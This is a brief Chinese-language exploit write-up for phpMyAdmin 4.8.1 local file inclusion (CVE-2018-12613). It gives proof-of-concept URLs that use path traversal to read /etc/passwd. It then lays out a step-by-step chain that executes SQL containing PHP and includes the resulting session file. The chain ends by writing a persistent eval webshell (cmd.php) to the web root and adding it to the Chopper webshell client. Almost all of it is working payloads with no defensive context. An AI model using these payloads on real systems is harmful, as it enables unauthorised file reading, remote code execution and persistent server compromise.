phpMyAdmin v4.8.1 本地文件包含 到写入webshell
CVE 编号: CVE-2018-12613
poc
http://xxxx.com/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
poc2
http://xxxx.com/index.php?target=sql.php?/../../../../../../../../../etc/passwd
写入webshell 利用
- 执行sql 语句
SELECT "<?php phpinfo();?>" - 包含session 文件
/index.php?target=sql.php?/../../../../../../../../../tmp/sess_7600504195960fdd23197b847708a866包含session 文件,出现phpinfo
从phpinfo中搜索CONTEXT_DOCUMENT_ROOT可查看web路径
- 写入webshell
select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST[pass]);?>')?>"
访问 cmd.php 文件已经存在,说明写入成功
- 菜刀添加webshell
